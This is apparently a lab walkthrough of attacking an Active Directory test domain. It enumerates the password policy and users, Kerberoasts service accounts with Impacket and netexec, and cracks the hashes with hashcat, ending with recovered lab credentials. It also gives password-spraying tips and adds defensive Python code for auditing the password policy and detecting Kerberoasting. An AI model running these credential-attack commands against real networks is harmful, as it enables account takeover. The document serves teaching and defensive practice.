Previously:

Found two usernames and passwords, for the users samwell.tarly and brandon.stark.

Note: A good thing to note here is not to use any password spraying yet, as there is a high chance of locking out the users. It's always good practice to look at the domain's password policy first.

crackmapexec smb winterfell --pass-pol (or netexec smb winterfell --pass-pol):

└─# netexec smb winterfell --pass-pol
SMB         172.16.100.51   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         172.16.100.51   445    WINTERFELL       [+] Dumping password info for domain: NORTH
SMB         172.16.100.51   445    WINTERFELL       Minimum password length: 5
SMB         172.16.100.51   445    WINTERFELL       Password history length: 24
SMB         172.16.100.51   445    WINTERFELL       Maximum password age: 311 days 2 minutes 
SMB         172.16.100.51   445    WINTERFELL       
SMB         172.16.100.51   445    WINTERFELL       Password Complexity Flags: 000000
SMB         172.16.100.51   445    WINTERFELL           Domain Refuse Password Change: 0
SMB         172.16.100.51   445    WINTERFELL           Domain Password Store Cleartext: 0
SMB         172.16.100.51   445    WINTERFELL           Domain Password Lockout Admins: 0
SMB         172.16.100.51   445    WINTERFELL           Domain Password No Clear Change: 0
SMB         172.16.100.51   445    WINTERFELL           Domain Password No Anon Change: 0
SMB         172.16.100.51   445    WINTERFELL           Domain Password Complex: 0
SMB         172.16.100.51   445    WINTERFELL       
SMB         172.16.100.51   445    WINTERFELL       Minimum password age: 1 day 4 minutes 
SMB         172.16.100.51   445    WINTERFELL       Reset Account Lockout Counter: 5 minutes 
SMB         172.16.100.51   445    WINTERFELL       Locked Account Duration: 5 minutes 
SMB         172.16.100.51   445    WINTERFELL       Account Lockout Threshold: 5
SMB         172.16.100.51   445    WINTERFELL       Forced Log off Time: Not Set

From the above we can see the lockout policy: 5 failed attempts within a 5-minute window (the lockout counter resets after 5 minutes) lock the account for 5 minutes.
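As an added example (not part of the original writeup), a small Python parser for the netexec --pass-pol output above that pulls out the policy values and flags the ones below a hardening baseline. The baseline thresholds (14-character minimum, complexity enforced, lockout duration and counter reset of at least 15 minutes) are my assumptions, not something the page states.

```python
import re

# Constructed sample: the policy lines from the netexec --pass-pol run above
PASS_POL_OUTPUT = """\
SMB         172.16.100.51   445    WINTERFELL       Minimum password length: 5
SMB         172.16.100.51   445    WINTERFELL       Password history length: 24
SMB         172.16.100.51   445    WINTERFELL       Maximum password age: 311 days 2 minutes
SMB         172.16.100.51   445    WINTERFELL           Domain Password Complex: 0
SMB         172.16.100.51   445    WINTERFELL       Minimum password age: 1 day 4 minutes
SMB         172.16.100.51   445    WINTERFELL       Reset Account Lockout Counter: 5 minutes
SMB         172.16.100.51   445    WINTERFELL       Locked Account Duration: 5 minutes
SMB         172.16.100.51   445    WINTERFELL       Account Lockout Threshold: 5
SMB         172.16.100.51   445    WINTERFELL       Forced Log off Time: Not Set
"""

# Strip the "SMB <ip> <port> <host>" prefix netexec prepends to every line
LINE_RE = re.compile(r"^SMB\s+\S+\s+\d+\s+\S+\s+(.*?)\s*$")

def parse_pass_pol(output):
    """Return {setting: value} parsed from netexec/crackmapexec --pass-pol output."""
    policy = {}
    for line in output.splitlines():
        m = LINE_RE.match(line)
        if not m or ":" not in m.group(1):
            continue
        key, _, value = m.group(1).partition(":")
        policy[key.strip()] = value.strip()
    return policy

def minutes(value):
    """Convert 'N days M minutes' style durations to minutes ('Not Set' -> 0)."""
    factors = {"day": 1440, "hour": 60, "minute": 1}
    return sum(int(n) * factors[u] for n, u in re.findall(r"(\d+)\s*(day|hour|minute)", value))

def assess(policy):
    """Flag settings below an assumed hardening baseline (14 chars, complexity on,
    lockout duration and counter reset of at least 15 minutes); returns findings."""
    findings = []
    if int(policy["Minimum password length"]) < 14:
        findings.append("minimum length below 14")
    if policy.get("Domain Password Complex", "0") == "0":
        findings.append("complexity not enforced")
    if int(policy["Account Lockout Threshold"]) == 0:
        findings.append("no lockout threshold")
    if minutes(policy["Locked Account Duration"]) < 15:
        findings.append("lockout duration under 15 minutes")
    if minutes(policy["Reset Account Lockout Counter"]) < 15:
        findings.append("lockout counter resets in under 15 minutes")
    return findings
```

Run against the sample it reports four findings: the NORTH domain has a lockout threshold, but a short minimum length, no complexity and a 5-minute lockout window.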

From here there are a few options to check for other attacks:
  1. Kerberoasting
  2. Check for possible RDP to Winterfell using the gained creds
  3. Drop in SharpHound to check for other cool stuff

We shall start by finding more users in the domain(s).

As we've found some users, let's see if we can find more users in the domain(s) and what we can get from those creds.

From MayFly’s blogs:
  • When you get an account on an Active Directory, the first thing to do is always to get the full list of users.
  • Once you get it you could do a password spray on the full user list (very often you will find other accounts with weak passwords like username=password, SeasonYear!, SocietynameYear! or even 123456).

GetADUsers.py -all north.sevenkingdoms.local/brandon.stark:iseedeadpeople
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Querying north.sevenkingdoms.local for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------
Administrator                                         2022-06-29 00:32:20.901897  2022-07-01 17:48:41.983605 
Guest                                                 <never>              <never>             
vagrant                                               2021-05-12 13:38:55.922520  2022-07-01 12:08:35.223885 
krbtgt                                                2022-06-29 00:48:58.950440  <never>             
arya.stark                                            2022-06-29 07:48:08.060667  2022-07-03 17:40:06.721358 
eddard.stark                                          2022-06-29 07:48:11.560625  2022-07-04 23:33:27.976702 
catelyn.stark                                         2022-06-29 07:48:15.013735  <never>             
robb.stark                                            2022-06-29 07:48:18.544972  2022-07-04 23:35:50.678794 
sansa.stark                                           2022-06-29 07:48:21.607059  <never>             
brandon.stark                                         2022-06-29 07:48:24.278459  2022-07-04 23:36:08.991489 
rickon.stark                                          2022-06-29 07:48:26.966809  <never>             
hodor                                                 2022-06-29 07:48:29.670052  2022-07-04 23:21:58.774078 
jon.snow                                              2022-06-29 07:48:32.373101  2022-07-03 17:36:26.798060 
samwell.tarly                                         2022-06-29 07:48:35.107476  2022-07-01 16:35:17.043960 
jeor.mormont                                          2022-06-29 07:48:37.841846  <never>             
sql_svc                                               2022-06-29 07:48:40.248028  2022-07-03 15:56:57.924607

ldapsearch -H ldap://172.16.100.51 -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=north,DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))" | grep 'distinguishedName:'

  • With an LDAP query we can request the users of the other domains because a trust is present.

  • On essos.local

ldapsearch -H ldap://172.16.100.52 -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=essos,DC=local' "(&(objectCategory=person)(objectClass=user))"
ldapsearch -H ldap://172.16.100.50 -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))"

Kerberoasting

  • On an Active Directory, we will very often see users with an SPN set.

  • Let's find them with Impacket:

GetUserSPNs.py -request -dc-ip 192.168.56.11 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -outputfile kerberoasting.hashes
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
ServicePrincipalName                                 Name      MemberOf                                                    PasswordLastSet             LastLogon                   Delegation  
---------------------------------------------------  --------  ----------------------------------------------------------  --------------------------  --------------------------  -----------
CIFS/winterfell.north.sevenkingdoms.local            jon.snow  CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local  2022-06-29 07:48:32.373101  2022-06-29 10:34:54.308171  constrained 
HTTP/thewall.north.sevenkingdoms.local               jon.snow  CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local  2022-06-29 07:48:32.373101  2022-06-29 10:34:54.308171  constrained 
MSSQLSvc/castelblack.north.sevenkingdoms.local       sql_svc                                                               2022-06-29 07:48:40.248028  2022-06-29 22:54:57.422114              
MSSQLSvc/castelblack.north.sevenkingdoms.local:1433  sql_svc                                                               2022-06-29 07:48:40.248028  2022-06-29 22:54:57.422114

All the hashes will be stored in the file named kerberoasting.hashes.

  • We could also do that with cme, with the following command:

cme ldap 192.168.56.11 -u brandon.stark -p 'iseedeadpeople' -d north.sevenkingdoms.local --kerberoasting KERBEROASTING

  • Now let's try to crack the hashes:

hashcat -m 13100 --force -a 0 kerberoasting.hashes /usr/share/wordlists/rockyou.txt
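As an added detection-side example (not from the original writeup or the GOAD project), a Python snippet that runs over constructed 4769-style TGS request records and flags the pattern the GetUserSPNs request above produces on the domain controller: one account obtaining RC4 (0x17) service tickets for several user-account SPNs within seconds. The record layout, the 5-minute window and the two-service threshold are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed 4769-style (TGS request) records, modelled on the GetUserSPNs run above:
# one user asks for RC4 service tickets to several user-account SPNs within seconds.
# Field names follow the Windows 4769 event; the values are made up for this example.
EVENTS = [
    {"time": "2022-07-04T23:40:01", "TargetUserName": "brandon.stark",
     "ServiceName": "jon.snow", "TicketEncryptionType": "0x17"},
    {"time": "2022-07-04T23:40:01", "TargetUserName": "brandon.stark",
     "ServiceName": "sql_svc", "TicketEncryptionType": "0x17"},
    {"time": "2022-07-04T23:40:02", "TargetUserName": "brandon.stark",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12"},
    # Routine AES ticket for a computer account: should not be flagged
    {"time": "2022-07-04T23:41:10", "TargetUserName": "hodor",
     "ServiceName": "CASTELBLACK$", "TicketEncryptionType": "0x12"},
]

RC4_ETYPES = {"0x17", "0x18"}   # RC4-HMAC and RC4-HMAC-EXP
WINDOW = timedelta(minutes=5)   # assumed correlation window
THRESHOLD = 2                   # assumed number of distinct services before alerting

def is_roastable(ev):
    """RC4 service ticket for a user account (not a computer account, not krbtgt)."""
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"].lower() in RC4_ETYPES
            and not svc.endswith("$") and svc.lower() != "krbtgt")

def detect_kerberoasting(events, threshold=THRESHOLD, window=WINDOW):
    """Return {requesting account: sorted services} for accounts that obtained RC4
    service tickets for at least `threshold` distinct services inside `window`."""
    per_account = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        if is_roastable(ev):
            per_account[ev["TargetUserName"]].append(
                (datetime.fromisoformat(ev["time"]), ev["ServiceName"]))
    alerts = {}
    for account, reqs in per_account.items():
        for i, (start, _) in enumerate(reqs):
            services = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(services) >= threshold:
                alerts[account] = sorted(services)
                break
    return alerts
```

On the sample it alerts on brandon.stark for jon.snow and sql_svc, which is exactly the pair of accounts with SPNs listed in the GetUserSPNs output; enabling AES-only on those service accounts would make the RC4 request stand out even more.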

Creds found:

User: north/jon.snow:iknownothing